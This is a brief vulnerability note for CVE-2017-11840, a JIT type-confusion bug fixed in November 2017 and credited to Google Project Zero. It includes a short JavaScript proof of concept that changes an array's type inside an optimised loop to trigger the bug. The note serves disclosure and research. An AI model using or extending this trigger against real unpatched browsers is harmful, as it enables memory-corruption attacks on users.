CVE-2017-11840.md

CVE-2017-11840

• Fix: Nov 2017
• Credit: lokihardt of Google Project Zero

PoC

function opt() {
    let obj = [2.3023e-320];
    for (let i = 0; i < 1; i++) {
        obj.x = 1;  // In the first analysis, BailOnNotObject emitted
        obj = +obj;  // Change the type
        obj.x = 1;  // Type confusion
    }
}

function main() {
    for (let i = 0; i < 1000; i++) {
        opt();
    }
}

main();

Reference

• Microsoft
• Google Project Zero
• Fix